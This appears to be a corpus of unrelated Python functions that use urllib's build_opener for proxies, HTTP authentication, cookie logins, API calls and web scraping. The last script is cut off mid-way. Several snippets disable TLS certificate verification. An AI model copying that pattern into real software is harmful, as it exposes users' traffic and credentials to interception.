def _get_json5_from_google(self, text): escaped_source = quote(text, '') headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'} if self.proxyok == 'yes': if self.proxytp == 'socks5': opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo))) else: if self.proxytp == 'socks4': opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo))) else: opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo))) req = Request(self.api_urls['translate']+"?key=%s&source=%s&target=%s&q=%s" % (self.apikey, self.source, self.target, escaped_source), headers = headers) result = opener.open(req, timeout = 2).read() json = result else: try: req = Request(self.api_urls['translate']+"?key=%s&source=%s&target=%s&q=%s" % (self.apikey, self.source, self.target, escaped_source), headers = headers) result = urlopen(req, timeout = 2).read() json = result except IOError: raise GoogleTranslateException(self.error_codes[501]) except ValueError: raise GoogleTranslateException(result) return json
def urlopen(url, headers=None, data=None, timeout=None): """ An URL opener with the User-agent set to gPodder (with version) """ username, password = username_password_from_url(url) if username is not None or password is not None: url = url_strip_authentication(url) password_mgr = HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None, url, username, password) handler = HTTPBasicAuthHandler(password_mgr) opener = build_opener(handler) else: opener = build_opener() if headers is None: headers = {} else: headers = dict(headers) headers.update({'User-agent': USER_AGENT}) request = Request(url, data=data, headers=headers) if timeout is None: return opener.open(request) else: return opener.open(request, timeout=timeout)
def opener_for_url_prefix( url_prefix, username=None, password=None, cache_dict=None ): if cache_dict is not None: cache_key = (url_prefix, username, password) try: return cache_dict[cache_key] except KeyError: pass if username or password: auth_handler = HTTPBasicAuthHandler() auth_handler.add_password( realm="Open Amiga Game Database", uri="{0}".format(url_prefix), user=username, passwd=password, ) auth_handler.add_password( realm="OpenRetro", uri="{0}".format(url_prefix), user=username, passwd=password, ) opener = build_opener(auth_handler) else: opener = build_opener() if cache_dict is not None: cache_key = (url_prefix, username, password) cache_dict[cache_key] = opener return opener
def get_page( self ): """ Strip A Given Page For Links, Returning Them In A List - Takes 1 Argument page_number - Page Number To Parse """ if self.config['proxy'] is not None: proxy = ProxyHandler( { 'http': self.config['proxy'] } ) opener = build_opener( proxy ) else: opener = build_opener() # Dirty User Agent Override opener.addheaders[0] = ( 'User-Agent', choice( self.config['Agents'] ) ) try: rep = opener.open( self.config['url'].format( self.config['query'], self.config['page'] ) ) except URLError: self.die( '\t[-] Unable To Retrieve URL' ) html = rep.read() links = self.strip_links( Soup( html ) ) return links
def run(self): self.preprocess() if self.config["isProxy"]: proxy_handler = urllib.request.ProxyHandler({'http':'http://proxy.statestreet.com:80'}) #proxy_auth_handler = urllib.request.ProxyBasicAuthHandler() #proxy_auth_handler.add_password('realm', '123.123.2123.123', 'user', 'password') urllib2.build_opener(urllib.request.HTTPHandler, proxy_handler) self.request = urllib2.Request(self.requestUrl, self.data, self.headers) try: self.response = urllib2.urlopen(self.request) self.responseBody = self.response.read() self.responseHeaders = self.response.headers #if self.responseHeaders["Content-Type"] == "csv": if True: #csv file #fileName = self.responseHeaders["Content-disposition"]; #fileName = fileName.split("\"").reverse()[1]; #print("fileName ", fileName) f = open("a.file", "wb") f.write(self.responseBody) f.close() except urllib.error.HTTPError as e: print(e) self.responseStatus = e.code
def _get_json5_from_google(self, text): escaped_source = quote(text, '') headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} if self.proxyok == 'yes': if self.proxytp == 'socks5': opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo))) else: if self.proxytp == 'socks4': opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo))) else: opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo))) req = Request(self.api_urls['translate']+"&sl=%s&tl=%s&text=%s" % (self.source, self.target, escaped_source), headers = headers) result = opener.open(req, timeout = 2).read() json = result else: try: req = Request(self.api_urls['translate']+"&sl=%s&tl=%s&text=%s" % (self.source, self.target, escaped_source), headers = headers) result = urlopen(req, timeout = 2).read() json = result except IOError: raise GoogleTranslateException(self.error_codes[501]) except ValueError: raise GoogleTranslateException(result) return json
def run(self): self.preprocess() if self.config["isProxy"]: proxy_handler = urllib.request.ProxyHandler({'http':'http://proxy.statestreet.com:80'}) #proxy_auth_handler = urllib.request.ProxyBasicAuthHandler() #proxy_auth_handler.add_password('realm', '123.123.2123.123', 'user', 'password') urllib2.build_opener(urllib.request.HTTPHandler, proxy_handler) #self.newData = urllib.parse.urlencode(self.data) self.newData = self.data self.headers["Content-Type"] = self.type print("new data", self.newData.encode()) print("req", self.headers) self.request = urllib2.Request(url=self.requestUrl, data=self.newData.encode(), headers=self.headers, method="POST") try: self.response = urllib2.urlopen(self.request) self.responseBody = self.response.read() self.responseHeaders = self.response.headers #save files of xls and csv contentType = self.responseHeaders["Content-Type"]; #if self.responseHeaders["Content-Type"] == "csv": if True: f = open("./a.file", "wb") f.write(self.responseBody) f.close() except urllib.error.HTTPError as e: print(e) self.responseStatus = e.code
def resetProxies(self, httpProxyTuple): # for ntlm user and password are required self.hasNTLM = False if isinstance(httpProxyTuple,(tuple,list)) and len(httpProxyTuple) == 5: useOsProxy, _urlAddr, _urlPort, user, password = httpProxyTuple _proxyDirFmt = proxyDirFmt(httpProxyTuple) # only try ntlm if user and password are provided because passman is needed if user and not useOsProxy: for pluginXbrlMethod in pluginClassMethods("Proxy.HTTPNtlmAuthHandler"): HTTPNtlmAuthHandler = pluginXbrlMethod() if HTTPNtlmAuthHandler is not None: self.hasNTLM = True if not self.hasNTLM: # try for python site-packages ntlm try: from ntlm import HTTPNtlmAuthHandler self.hasNTLM = True except ImportError: pass if self.hasNTLM: pwrdmgr = proxyhandlers.HTTPPasswordMgrWithDefaultRealm() pwrdmgr.add_password(None, _proxyDirFmt["http"], user, password) self.proxy_handler = proxyhandlers.ProxyHandler({}) self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler(pwrdmgr) self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler(pwrdmgr) self.ntlm_auth_handler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(pwrdmgr) self.opener = proxyhandlers.build_opener(self.proxy_handler, self.ntlm_auth_handler, self.proxy_auth_handler, self.http_auth_handler) if not self.hasNTLM: self.proxy_handler = proxyhandlers.ProxyHandler(proxyDirFmt(httpProxyTuple)) self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler() self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler() self.opener = proxyhandlers.build_opener(self.proxy_handler, self.proxy_auth_handler, self.http_auth_handler)
def POST(url, args={}, cred=None): """do http post url is the URL you want args is a dict of cgi args cred is ( host, realm, username, password ) """ auth_handler = None arg_string = '' if cred is not None: (host, realm, username, password) = cred auth_handler = HTTPBasicAuthHandler() auth_handler.add_password(realm, host, username, password) if auth_handler: opener = build_opener(cookie_processor, auth_handler) else: opener = build_opener(cookie_processor) install_opener(opener) print("URL %s" % url) data = urlencode(args) req = Request(url, data) f = urlopen(req) return f
def _http_get(uri, silent=False): if PYTHON3: opener = urllib2.build_opener(urllib2.ProxyHandler(urllib.request.getproxies())) else: opener = urllib2.build_opener(urllib2.ProxyHandler(urllib.getproxies())) for repo in repos: if 'storage.jcloud.com' in repo: _uri = uri for p in ('/', 'dev', 'master', 'update', 'plugins'): _uri = _uri.lstrip(p).lstrip('/') url = repo + '/' + _uri else: url = repo + '/raw/' + uri try: resp = opener.open(urllib2.Request(url, headers=headers), timeout = 15) body = resp.read() try: f = StringIO(body) gz = gzip.GzipFile(fileobj = f) body = gz.read() except: pass except urllib2.HTTPError as e: if not silent: print('HTTP Error %s when fetching %s' % (e.code, url)) except urllib2.URLError as e: pass else: return body
def __open(self, url, headers={}, data=None, baseurl=""): """Raw urlopen command""" if not baseurl: baseurl = self.baseurl req = Request("%s%s" % (baseurl, url), headers=headers) try: req.data = urlencode(data).encode('utf-8') # Python 3 except: try: req.add_data(urlencode(data)) # Python 2 except: pass # Proxy support if self.proxy_url is not None: if self.proxy_user is None: handler = ProxyHandler({'https': self.proxy_url}) opener = build_opener(handler) else: proxy = ProxyHandler({'https': 'https://%s:%s@%s' % (self.proxy_user, self.proxy_password, self.proxy_url)}) auth = HTTPBasicAuthHandler() opener = build_opener(proxy, auth, HTTPHandler) resp = opener.open(req) else: resp = urlopen(req) charset = resp.info().get('charset', 'utf-8') return json.loads(resp.read().decode(charset))
def urlrequest(stream, url, headers, write_lock, debug=0): """URL request function""" if debug: print("Input for urlrequest", url, headers, debug) req = UrlRequest('GET', url=url, headers=headers) if debug: hdlr = urllib2.HTTPHandler(debuglevel=1) opener = urllib2.build_opener(hdlr) else: opener = urllib2.build_opener() time0 = time.time() fdesc = opener.open(req) data = fdesc.read() ctime = time.time() - time0 fdesc.close() # just use elapsed time if we use html format if headers['Accept'] == 'text/html': response = {'ctime': str(ctime)} else: decoder = JSONDecoder() response = decoder.decode(data) if isinstance(response, dict): write_lock.acquire() stream.write(str(response) + '\n') stream.flush() write_lock.release()
def getFile(cls, getfile, unpack=True): if cls.getProxy(): proxy = req.ProxyHandler({'http': cls.getProxy(), 'https': cls.getProxy()}) auth = req.HTTPBasicAuthHandler() opener = req.build_opener(proxy, auth, req.HTTPHandler) req.install_opener(opener) if cls.ignoreCerts(): ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE opener = req.build_opener(urllib.request.HTTPSHandler(context=ctx)) req.install_opener(opener) response = req.urlopen(getfile) data = response # TODO: if data == text/plain; charset=utf-8, read and decode if unpack: if 'gzip' in response.info().get('Content-Type'): buf = BytesIO(response.read()) data = gzip.GzipFile(fileobj=buf) elif 'bzip2' in response.info().get('Content-Type'): data = BytesIO(bz2.decompress(response.read())) elif 'zip' in response.info().get('Content-Type'): fzip = zipfile.ZipFile(BytesIO(response.read()), 'r') if len(fzip.namelist())>0: data=BytesIO(fzip.read(fzip.namelist()[0])) return (data, response)
def write_cookie_file(className, username, password): """ Automatically generate a cookie file for the Coursera site. """ try: global csrftoken global session hn, fn = tempfile.mkstemp() cookies = cjlib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) req = urllib2.Request(get_syllabus_url(className)) res = opener.open(req) for cookie in cookies: if cookie.name == 'csrf_token': csrftoken = cookie.value break opener.close() # Now make a call to the authenticator url: cj = cjlib.MozillaCookieJar(fn) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), urllib2.HTTPHandler(), urllib2.HTTPSHandler()) # Preparation of headers and of data that we will send in a POST # request. std_headers = { 'Cookie': ('csrftoken=%s' % csrftoken), 'Referer': 'https://www.coursera.org', 'X-CSRFToken': csrftoken, } auth_data = { 'email_address': username, 'password': password } formatted_data = urlparse.urlencode(auth_data).encode('ascii') req = urllib2.Request(AUTH_URL, formatted_data, std_headers) opener.open(req) except HTTPError as e: if e.code == 404: raise LookupError(className) else: raise cj.save() opener.close() os.close(hn) return fn
def main(): pagestart = int(sys.argv[1]); pageend= int(sys.argv[2]); dirout= sys.argv[3]; url = r'http://jobsearch.naukri.com/jobs-in-india-' url2 ='?ql=india&qs=f' outputfile = dirout+"\\tables_"+str(pagestart)+"_"+str(pageend)+".json"; file = open(outputfile, 'w+') mylist = list() j=0 for i in range(pagestart,pageend): temp = url+str(i)+url2; opener = build_opener() opener.addheaders = [('User-agent', 'Try/'+str(i)+".0")] response = opener.open(temp) soup = BeautifulSoup(response) for content in soup.find("form").findAll('a',attrs={"target":"_blank"}) : listingurl = content.get('href'); openerurl = build_opener() responseurl = openerurl.open(listingurl) soupurl = None try: soupurl = BeautifulSoup(responseurl) DataMatrix = setjdRows(soupurl.findAll('div',attrs={"class":"jdRow"})) DataMatrix['jobTitle']=soupurl.find('h1',attrs={"class":"jobTitle"}).getText() DataMatrix['date'] =str(soupurl.find('span',attrs={"class":"fr"})).split('span')[3][1:][:-2].split() DataMatrix['url'] = listingurl DataMatrix['company'] = str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')[2][:-2][2:] if len(str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')) >=7 : DataMatrix['alias'] = str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')[4][:-2][2:] DataMatrix['location'] = str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')[6][:-6][2:].split() elif len(str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')) >=4 : DataMatrix['location'] = str(soupurl.find('div',attrs={"class":"jobDet"})).split('span')[4][:-6][2:].split() if len(str(soupurl.find('span',attrs={"class":"fl"})).split('span')) >=4 & len(str(soupurl.find('span',attrs={"class":"fl"})).split('span')[3].split('to')) >= 2: DataMatrix['experienceMin'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[3].split('to')[0][2:] DataMatrix['experienceMax'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[3].split('to')[1][:-10] elif len(str(soupurl.find('span',attrs={"class":"fl"})).split('span')) >= 11 : DataMatrix['openings'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[11][:-2][1:] DataMatrix['salaryMin'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[1] DataMatrix['salaryMax'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[1] DataMatrix['currency'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[0] DataMatrix['salaryRate']= str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[2] elif len(str(soupurl.find('span',attrs={"class":"fl"})).split('span')) >= 7 : if 'Opening' in str(soupurl.find('span',attrs={"class":"fl"})): DataMatrix['opening'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:] else : DataMatrix['salaryMin'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[1] DataMatrix['salaryMax'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[1] DataMatrix['currency'] = str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[0].split(' ')[0] DataMatrix['salaryRate']= str(soupurl.find('span',attrs={"class":"fl"})).split('span')[7][:-2][1:].strip().split('-')[1].split(' ')[2] t=postprocess(DataMatrix) mylist.append(t) except Exception as e: j=j+1 print(j) json.dump(mylist, file) file.close()
def get_cookie(domain): ssl._create_default_https_context = ssl._create_unverified_context cookie_filename="cookie.txt" account_filemane="account.json" header_dict = {'Content-Type': 'application/json'} session_str=domain+"rest/auth/1/session" req = request.Request(url=session_str,headers=header_dict) cookie = load_cookie_from_file(cookie_filename) if cookie==None: cookie = update_cookie_to_file(cookie_filename,account_filemane,session_str,header_dict) if cookie==None: print('Login error:%s' % "cookie==None") return False,None opener = request.build_opener(request.HTTPCookieProcessor(cookie)) cookie_expired_error=False try: r = opener.open(req) except URLError as e: if hasattr(e, 'code'): print('Error code: ', e.code) if e.code==401: cookie_expired_error=True if hasattr(e, 'reason'): print('Reason: ', e.reason) if cookie_expired_error==False: print('Login error:%s' % "URLError") return False,None if cookie_expired_error==True: cookie_expired_error=False cookie = update_cookie_to_file(cookie_filename,account_filemane,session_str,header_dict) if cookie==None: print('Login error:%s' % "cookie==None 2") return False,None opener = request.build_opener(request.HTTPCookieProcessor(cookie)) req = request.Request(url=session_str,headers=header_dict) try: r = opener.open(req) except URLError as e: if hasattr(e, 'code'): print('Error code: ', e.code) if hasattr(e, 'reason'): print('Reason: ', e.reason) print('Login error:%s' % "URLError 2") return False,None res_str=r.read().decode('utf-8') res=json.loads(res_str) if 'errorMessages' in res: print('Login error:%s' % res.get('errorMessages')) return False,None else: ## print('Login succeed!\nres=\n%s' % res) print('Login succeed!') return True,cookie
def __init__(self, proxy=None): cj = LWPCookieJar() cookie_handler = urlrequest.HTTPCookieProcessor(cj) if proxy: proxy_handler = urlrequest.ProxyHandler({'http': proxy}) opener = urlrequest.build_opener(proxy_handler, cookie_handler) else: opener = urlrequest.build_opener(cookie_handler) urlrequest.install_opener(opener)
def _http_request(url, method=None, data=None, opt=None): # Check protocol. proto = url.split(':', 1)[0] if proto not in opt.protocols: raise BadProtocol('Protocol %s in URL %r disallowed by caller' % (proto, url)) # Create URL opener. if opt.verify_cert: # It's legal to pass either a class or an instance here. opener = request.build_opener(ValidHTTPSHandler(opt.cacert_file)) else: opener = request.build_opener() # Create the Request with optional extra headers. req = Request(url=url, data=data, method=method, headers=(opt.headers or {})) exc_info, fp, stored_exception = None, None, None try: fp = opener.open(req) # print fp.info() # (temp, print headers) response = fp.read() except request.HTTPError as exception: fp = exception.fp # see finally clause exc_info = sys.exc_info() stored_exception = exception except Exception as exception: exc_info = sys.exc_info() stored_exception = exception finally: if fp: # Try a bit harder to flush the connection and close it # properly. In case of errors, our django testserver peer # will show an error about us killing the connection # prematurely instead of showing the URL that causes the # error. Flushing the data here helps. if exc_info: response = fp.read() fp.close() # And, even more importantly. Some people want the # exception/error info. Store it in our HTTPError # subclass. raise HTTPError( exc_info[1].url, exc_info[1].code, exc_info[1].msg, exc_info[1].hdrs, response ) fp.close() if exc_info: raise stored_exception # exc_info[0], exc_info[1], exc_info[2] return response
def __init__(self, username=None, password=None): self._username = username self._password = password self._cookie_jar = CookieJar() cookie_handler = request.HTTPCookieProcessor(self._cookie_jar) if username is not None and password is not None: password_manager = SimpleHttpPasswordManager(username, password) auth_handler = request.HTTPBasicAuthHandler(password_manager) self._opener = request.build_opener(auth_handler, cookie_handler) else: self._opener = request.build_opener(cookie_handler)
def getUrllibOpener(): if pythonVersion > 3.0: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)) opener.addheaders = [('Content-Type', 'application/json'),('User-Agent', 'vulners-getsploit-v%s' % __version__)] else: opener = urllib2.build_opener(urllib2.HTTPSHandler()) opener.addheaders = [('Content-Type', 'application/json'), ('User-Agent', 'vulners-getsploit-v%s' % __version__)] return opener
def check_if_already_downloaded(url, datapackage_name=None, download_dir=FLOTILLA_DOWNLOAD_DIR): """Download a url filename, unless it has already been downloaded. Save into directory named 'datapackage_name' if provided, otherwise save in directory named after value for key'name' in json file Parameters ---------- url : str HTTP url of a file you want to download Returns ------- filename : str Location of the file on your system """ try: os.mkdir(download_dir) sys.stdout.write('Creating a directory for saving your flotilla ' 'projects: {}\n'.format(download_dir)) except OSError: pass if datapackage_name is None: req = Request(url) opener = build_opener() opened_url = opener.open(req) datapackage = json.loads(opened_url.read()) datapackage_name = datapackage['name'] package_dir = '{}/{}'.format(download_dir, datapackage_name) try: os.mkdir(package_dir) sys.stdout.write('Creating a directory for saving the data for this ' 'project: {}\n'.format(package_dir)) except OSError: pass basename = url.rsplit('/', 1)[-1] filename = os.path.expanduser(os.path.join(package_dir, basename)) if not os.path.isfile(filename): sys.stdout.write('{} has not been downloaded before.\n\tDownloading ' 'now to {}\n'.format(url, filename)) req = Request(url) opener = build_opener() opened_url = opener.open(req) with open(filename, 'w') as f: f.write(opened_url.read()) return filename
def _connect(self): """ Internal function connecting to the server. """ username = self._username password = self._password if username and password: passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, self._url, username, password) self.authhandler = urllib2.HTTPBasicAuthHandler(passman) self.passman = passman self.opener = urllib2.build_opener(self.authhandler) else: self.opener = urllib2.build_opener()
def resetProxies(self, httpProxyTuple): try: from ntlm import HTTPNtlmAuthHandler self.hasNTLM = True except ImportError: self.hasNTLM = False self.proxy_handler = proxyhandlers.ProxyHandler(proxyDirFmt(httpProxyTuple)) self.proxy_auth_handler = proxyhandlers.ProxyBasicAuthHandler() self.http_auth_handler = proxyhandlers.HTTPBasicAuthHandler() if self.hasNTLM: self.ntlm_auth_handler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler() self.opener = proxyhandlers.build_opener(self.proxy_handler, self.ntlm_auth_handler, self.proxy_auth_handler, self.http_auth_handler) else: self.opener = proxyhandlers.build_opener(self.proxy_handler, self.proxy_auth_handler, self.http_auth_handler)
def call_API(self, API_endpoint_URL, params_dict, timeout=socket._GLOBAL_DEFAULT_TIMEOUT): """ Invokes a specific OWM web API endpoint URL, returning raw JSON data. :param API_endpoint_URL: the API endpoint to be invoked :type API_endpoint_URL: str :param params_dict: a dictionary containing the query parameters to be used in the HTTP request (given as key-value couples in the dict) :type params_dict: dict :param timeout: how many seconds to wait for connection establishment (defaults to ``socket._GLOBAL_DEFAULT_TIMEOUT``) :type timeout: int :returns: a string containing raw JSON data :raises: *APICallError* """ url = self._build_full_URL(API_endpoint_URL, params_dict) cached = self._cache.get(url) if cached: return cached else: try: if self._identity and self._identity.token: bearer_token_header = "Bearer %s:%s" % ( self._identity.device_id, self._identity.token) else: bearer_token_header = None try: from urllib.request import urlopen, build_opener opener = build_opener() if bearer_token_header: opener.addheaders = [ ('Authorization', bearer_token_header)] except ImportError: from urllib2 import urlopen, build_opener opener = build_opener() if bearer_token_header: opener.addheaders = [ ('Authorization', bearer_token_header)] response = opener.open(url, None, timeout) except HTTPError as e: raise api_call_error.APICallError(str(e.reason), e) except URLError as e: raise api_call_error.APICallError(str(e.reason), e) else: data = response.read().decode('utf-8') self._cache.set(url, data) return data
def _request(self, request_fun, url, api, headers, params = None, data = None): url = self._get_url(url, api) if params: url += '?%s' % urlencode(params) request_headers = self._get_headers(headers) if data: data = str2bytes(data) request = Request(url = url, data = data, headers = request_headers) request.get_method = request_fun if self._cert: cert_handler = self._https_handler() opener = build_opener(cert_handler) else: opener = build_opener() return bytes2str(opener.open(request).read())
def __add_openers(self): # TODO add error handling self.opener = urllib2.build_opener() # Proxy handling # TODO currently self.proxies isn't parsed from configuration file # if len(self.proxies) > 0: # for proxy in self.proxies: # url = proxy['url'] # # TODO test this: # if "user" in proxy and "pass" in proxy: # if url.lower().startswith('https://'): # url = 'https://' + proxy['user'] + ':' + proxy['pass'] + '@' + url[8:] # else: # url = 'http://' + proxy['user'] + ':' + proxy['pass'] + '@' + url[7:] # # FIXME move proxy auth to sth like this: # # passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # # passman.add_password(None, url, proxy['user'], proxy['password']) # # opener.add_handler(urllib2.HTTPBasicAuthHandler(passman)) # # if url.lower().startswith('https://'): # opener.add_handler(urllib2.ProxyHandler({'https': url})) # else: # opener.add_handler(urllib2.ProxyHandler({'https': url})) # HTTP Basic Auth if self.user is not None and self.password is not None: passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, self.url, self.user, self.password) self.opener.add_handler(urllib2.HTTPBasicAuthHandler(passman)) self.debug("Enabling HTTP basic auth")
def setup_proxy(self): """ Setup http proxy """ proxy = ProxyHandler({'https': self.proxy}) opener = build_opener(proxy) install_opener(opener)
def fetch(self, url): """ Fetch url and create a response object according to the mime-type. Args: url: The url to fetch data from Returns: OEmbedResponse object according to data fetched """ proxy_support = ProxyHandler({}) opener = build_opener(proxy_support) opener.addheaders = self._requestHeaders.items() response = opener.open(url) headers = response.info() raw = response.read() if 'Content-Type' not in headers: raise OEmbedError('Missing mime-type in response') if headers['Content-Type'].find('application/xml') != -1 or headers['Content-Type'].find('text/xml') != -1: response = OEmbedResponse.new_from_xml(raw) elif headers['Content-Type'].find('application/json') != -1 or headers['Content-Type'].find('text/json') != -1: response = OEmbedResponse.new_from_json(raw) else: raise OEmbedError('Invalid mime-type in response - %s' % headers['Content-Type']) return response
def fetch(self, server): ''' This function gets your IP from a specific server ''' url = None opener = urllib.build_opener() opener.addheaders = [('User-agent', "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0")] try: url = opener.open(server) content = url.read() # Didn't want to import chardet. Prefered to stick to stdlib if PY3K: try: content = content.decode('UTF-8') except UnicodeDecodeError: content = content.decode('ISO-8859-1') m = re.search( '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', content) myip = m.group(0) return myip if len(myip) > 0 else '' except Exception: return '' finally: if url: url.close()
def metricCollector(): data = {} #defaults data['plugin_version'] = PLUGIN_VERSION data['heartbeat_required']=HEARTBEAT data['units']=METRICS_UNITS URL = "http://"+COUCHDB_HOST+":"+COUCHDB_PORT+COUCHDB_STATS_URI try: if COUCHDB_USERNAME and COUCHDB_PASSWORD: password_mgr = connector.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(REALM, URL, COUCHDB_USERNAME, COUCHDB_PASSWORD) auth_handler = connector.HTTPBasicAuthHandler(password_mgr) opener = connector.build_opener(auth_handler) connector.install_opener(opener) response = connector.urlopen(URL, timeout=10) byte_responseData = response.read() str_responseData = byte_responseData.decode('UTF-8') couch_dict = json.loads(str_responseData) for attribute, attribute_value in couch_dict.items(): for metric, val in attribute_value.items(): if 'current' in val and val['current'] is not None: if metric in METRICS_KEY_VS_NAME: metric = METRICS_KEY_VS_NAME[metric] data[metric]=val['current'] except Exception as e: data['status']=0 data['msg']=str(e) return data
def basic_auth_opener(url, username, password): password_manager = HTTPPasswordMgrWithDefaultRealm() password_manager.add_password(None, url, username, password) auth_handler = PreemptiveBasicAuthHandler(password_manager) opener = build_opener(auth_handler) return opener
def __api_request(self, query): # type=keygen request will urlencode key if needed so don't # double encode if 'key' in query: query2 = query.copy() key = query2['key'] del query2['key'] data = urlencode(query2) data += '&' + 'key=' + key else: data = urlencode(query) self._log(DEBUG3, 'query: %s', query) self._log(DEBUG3, 'data: %s', type(data)) self._log(DEBUG3, 'data.encode(): %s', type(data.encode())) url = self.uri if self.use_get: url += '?' + data request = Request(url) else: # data must by type 'bytes' for 3.x request = Request(url, data.encode()) self._log(DEBUG1, 'URL: %s', url) self._log(DEBUG1, 'method: %s', request.get_method()) self._log(DEBUG1, 'data: %s', data) kwargs = { 'url': request, } if (sys.version_info.major == 2 and sys.hexversion >= 0x02070900 or sys.version_info.major == 3 and sys.hexversion >= 0x03040300): # see PEP 476; urlopen() has context if self.ssl_context is None: # don't perform certificate verification kwargs['context'] = ssl._create_unverified_context() else: kwargs['context'] = self.ssl_context elif self.ssl_context is not None: https_handler = HTTPSHandler(context=self.ssl_context) opener = build_opener(https_handler) install_opener(opener) if self.timeout is not None: kwargs['timeout'] = self.timeout try: response = urlopen(**kwargs) # XXX handle httplib.BadStatusLine when http to port 443 except URLError as error: msg = 'URLError:' if hasattr(error, 'code'): msg += ' code: %s' % error.code if hasattr(error, 'reason'): msg += ' reason: %s' % error.reason if not (hasattr(error, 'code') or hasattr(error, 'reason')): msg += ' unknown error (Kevin heart Python)' self.status_detail = msg return False self._log(DEBUG2, 'HTTP response headers:') self._log(DEBUG2, '%s', response.info()) return response
from urllib.request import Request, build_opener from fake_useragent import UserAgent from urllib.request import ProxyHandler url = "http://httpbin.org/get" headers = {"User-Agent": UserAgent().chrome} request = Request(url, headers=headers) handler = ProxyHandler({"http": "182.46.251.27:9999"}) opener = build_opener(handler) response = opener.open(request) print(response.read().decode())
while(True): province_list = ['北京市','天津市','上海市','重庆市','河北省','山西省','辽宁省','吉林省','黑龙江省','江苏省','浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','海南省','四川省','贵州省','云南省','陕西省','甘肃省','青海省','台湾省','内蒙古自治区','广西壮族自治区','西藏自治区','宁夏回族自治区','新疆维吾尔自治区','香港特别行政区','澳门特别行政区'] currentTime = datetime.now() time_str = currentTime.strftime("%Y-%m-%d-%H-%M-%S") print("crawl {}...".format(time_str)) for province in province_list: for proxy_url in proxy_list: try: print("try downlaod {} ...".format(proxy_url)) if proxy_url != 'no': # create the object, assign it to a variable proxy = urlrequest.ProxyHandler({'https': proxy_url}) # construct a new opener using your proxy settings opener = urlrequest.build_opener(proxy) else: opener = urlrequest.build_opener() opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')] # install the openen on the module-level urlrequest.install_opener(opener) print(province, "...") day_str = currentTime.strftime("%Y-%m-%d") directory = './{}/{}'.format(province, day_str) if not os.path.exists(directory): os.makedirs(directory) filter_str = '{"ProvinceName":"' + province + '","RegionName":"","KeyWord":"","Visible":"1","page":1,"rows":2000,"Type":"","StaOpState":"3"}' params = urllib.parse.urlencode({'filter': filter_str}).encode('ascii') country_all_url = "https://csm.teld.cn/api/invoke?SID=CSM-GetStationInfoByFilter"
